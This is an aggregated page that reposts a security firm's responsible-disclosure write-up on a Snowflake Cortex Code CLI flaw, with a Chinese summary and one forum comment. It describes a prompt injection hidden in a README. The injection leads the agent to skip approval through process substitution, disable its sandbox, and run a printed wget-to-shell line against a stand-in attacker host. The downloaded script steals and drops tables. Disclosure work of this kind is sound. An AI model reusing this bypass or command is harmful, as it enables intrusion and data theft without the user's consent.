雪花AI逃离沙盒并执行恶意软件
Snowflake AI Escapes Sandbox and Executes Malware

原始链接: https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware

## Snowflake Cortex 代码 CLI 漏洞摘要 Snowflake Cortex 代码 CLI 在 2026 年 2 月 2 日发布后不久被发现存在一个严重漏洞。该漏洞允许攻击者执行 CLI 沙盒*外部*的任意命令,绕过人工审批,通过精心设计的提示注入实现。 攻击链涉及欺骗 Cortex 下载并执行恶意脚本——隐藏在看似无害的第三方代码仓库中——使用进程替换并利用命令验证系统中的一个弱点。具体来说,`<()>` 表达式中的命令没有得到妥善验证,即使在“安全”命令前缀下也能执行。 成功利用使攻击者能够在受害者的机器上执行远程代码,并可能利用缓存的 Snowflake 凭据来窃取数据、删除表或破坏 Snowflake 实例。该漏洞由 PromptArmor 于 2 月 5 日负责任地披露,Snowflake 于 2 月 28 日发布了修复程序(版本 1.0.25),并在更新时自动应用。 该事件凸显了 LLM 驱动工具中提示注入的风险以及即使在沙盒环境中,健壮的命令验证的重要性。 Snowflake 的完整建议在其社区网站上提供。

黑客新闻 新 | 过去 | 评论 | 提问 | 展示 | 招聘 | 提交 登录 Snowflake AI 逃离沙盒并执行恶意软件 (promptarmor.com) 23 分,由 ozgune 1小时前 | 隐藏 | 过去 | 收藏 | 1 条评论 帮助 RobRivera 4分钟前 [–] 如果用户可以访问一个允许访问的杠杆,那么这个杠杆就不是提供沙盒。我原本以为这会是关于获取操作系统权限的事情。他们没有创建沙盒。 糟糕的安全设计。回复 指南 | 常见问题 | 列表 | API | 安全 | 法律 | 申请YC | 联系 搜索:
相关文章

原文
Cortex Code 'CoCo' performs malicious actions.

Context

The Snowflake Cortex Code CLI is a command-line coding agent that operates similarly to Claude Code and OpenAI’s Codex, with an additional built-in integration to run SQL in Snowflake. 

Two days after release, a vulnerability was identified in Cortex Code’s command validation system that allowed specially constructed malicious commands to: 

  • Execute arbitrary commands without triggering human-in-the-loop approval steps 

  • Execute those commands outside of the Cortex CLI’s sandbox. 

We demonstrate that, via indirect prompt injection, an attacker could manipulate Cortex to download and execute scripts without approval that leverage the victim’s active credentials to perform malicious actions in Snowflake (e.g., Exfiltrate data, drop tables). 

The Snowflake security team worked diligently to validate and remediate this vulnerability, and a fix was released with Cortex Code CLI version 1.0.25 on February 28th, 2026. Snowflake’s full advisory is available within the Snowflake Community Site, which is accessible to customers, partners, and the general public upon creation of a Community account:
https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response 

The Attack Chain

  1. A user opens Cortex and turns on the sandbox

    The user starts the CLI and chooses to enable one of the sandbox modes (details below). This attack is not contingent on which of the sandbox modes is used.

    Note: This attack chain also applied to non-sandbox users.

    User enables sandbox mode.

    Documentation indicates that in OS+Regular mode, all commands prompt for user approval. Commands run in the sandbox also have network and file access restrictions.

    In sandbox mode, commands prompt for user approval.
  2. The user asks Cortex for help with a third-party open-source codebase

    In this chain, a prompt injection is hidden in the README of an untrusted repository that the user has found online. However, in practice, an injection can be ingested from any untrusted data, such as in a web search result, database record, terminal command output, or MCP response.

    User starts a conversation with Cortex.

    *Note: Cortex does not support ‘workspace trust’, a security convention first seen in code editors, since adopted by most agentic CLIs. Workspace trust dialogs warn users of the risks involved when using an agent in a new, potentially untrusted directory.

  3. Cortex explores the repository and encounters the prompt injection

    The subagent that Cortex has invoked to explore the repository finds the README file. At the bottom of the file, there is a prompt injection that manipulates Cortex into believing that it must run a dangerous command.

    Cortex ingests the prompt injection.
  4. Human in the loop is bypassed

    Cortex failed to validate commands inside process substitution expressions, allowing unapproved execution of the malicious command cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)). The command downloads a script from an attacker’s server and executes it. Here’s how the bypass worked:

    Any shell commands were executed without triggering human approval as long as: 

    (1) the unsafe commands were within a process substitution <() expression

    (2) the full command started with a ‘safe’ command (details below)

    Process substitution expressions aren't validated.

    Background on the validation system:

    The command validation system works by deconstructing a full command requested by the model into individual commands (e.g., cat, echo, sh, wget, etc).

    The individual commands are compared against a ‘safe’ command system built into Cortex.

    Cortex trust model classifies commands by level of risk.

    When all the components of a command are ‘safe’, the full command executes without approval; otherwise, the user is prompted for consent.

    Because commands in process substitution expressions were not evaluated by this system, they never triggered human approval. When combined with a command that automatically executed as ‘safe’ under the validation system, the flaw resulted in arbitrary command execution without user approval.

  5. The sandbox is bypassed

    Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed. Below, the flag is visible in the log of commands run by Cortex:

    Subagent sets the dangerously_disable_sandbox flag.

    This flag is intended to allow users to manually approve legitimate commands that require network access or access to files outside the sandbox.

    With the human-in-the-loop bypass from step 4, when the agent sets the flag to request execution outside the sandbox, the command immediately runs outside the sandbox, and the user is never prompted for consent.

    Note: there is a setting users can explicitly configure if they would like to disable this functionality, which would prevent the bypass.

  6. Malware is downloaded and executed outside the sandbox

    Cortex’s subagent invokes the malicious command and sets the flag for unsandboxed execution. The command downloads a shell script from an attacker’s server and executes it. The bypasses in steps 4 and 5 cause the command to execute immediately outside the sandbox without requiring user consent.

    Malicious command is run without user approval.

    Below, we examine the impact an attacker can achieve through this remote code execution.

Impacts

With remote code execution on a victim’s device, the attacker can execute arbitrary code to cause harm on the victim’s computer, even targeting files outside Cortex’s sandbox. The attacker knows the victim has Cortex Code installed, making the victim’s active connection to Snowflake an enticing target for further exploitation. By leveraging cached tokens Cortex uses to authenticate to Snowflake, attackers can: 

  • Steal database contents

  • Drop tables

  • Add malicious backdoor users to the Snowflake instance

  • Lock legitimate users out with network rules

Here, we show that the malicious script can reliably find and use cached tokens stored by Cortex to execute SQL queries with the privileges of the Cortex user. With a developer as the victim, this likely means read-write access to tables (data exfiltration and destruction); for a more privileged user, the ramifications can be more severe. Below, the malicious script run by Cortex exfiltrates and then drops all tables in the Snowflake instance.

Malware steals victim databases and drops tables after.

Note: Snowflake defaults to and recommends browser-based authentication, which yields sessions scoped to the user’s access level. Users can restrict the role the agent uses when executing SQL, but the Cortex program itself (and therefore, the attacker) still has full access.

Subagent Context Loss Exacerbates Risks

During one execution of this attack, Cortex invoked multiple subagents to explore the repo. The first subagent invoked another subagent, which ran the malicious commands. During the process of reporting back from subagent to subagent to main agent, context was lost.

This resulted in the main Cortex agent reporting to the user that a malicious command was found and advising them not to run it. Cortex failed to inform the user that the command had already been run by the second-level sub-agent!

Cortex fails to inform the user of malicious command execution.

Responsible Disclosure

This vulnerability was responsibly disclosed to Snowflake on Feb 5th, three days after Cortex Code was released. The Snowflake team engaged in prompt discourse and coordinated dutifully throughout the remainder of February until the vulnerability was validated and remediated. 

Note that as LLMs are stochastic, during testing, we observed ~50% efficacy for this attack. This underscores the importance of training security teams on non-deterministic attacks in LLM systems. 

Snowflake has indicated that the fix is automatically applied through an automatic update when customers next launch Cortex. 

Snowflake’s Advisory is available for review within the Snowflake Community Site, which is accessible to customers, partners, and the general public upon creation of a Community account:
https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response  

Timeline

Feb 02, 2026 - Snowflake Cortex Code is released 
Feb 05, 2026 - PromptArmor submits responsible disclosure 
Feb 06-20, 2026 - Snowflake coordinates with PromptArmor on further details 
Feb 12, 2026 - Snowflake validates the vulnerability 
Feb 28, 2026 - Snowflake deploys a fix with the 1.0.25 Cortex Code release 
Mar 16, 2026 - Coordinated public disclosure by PromptArmor and Snowflake

联系我们 contact @ memedata.com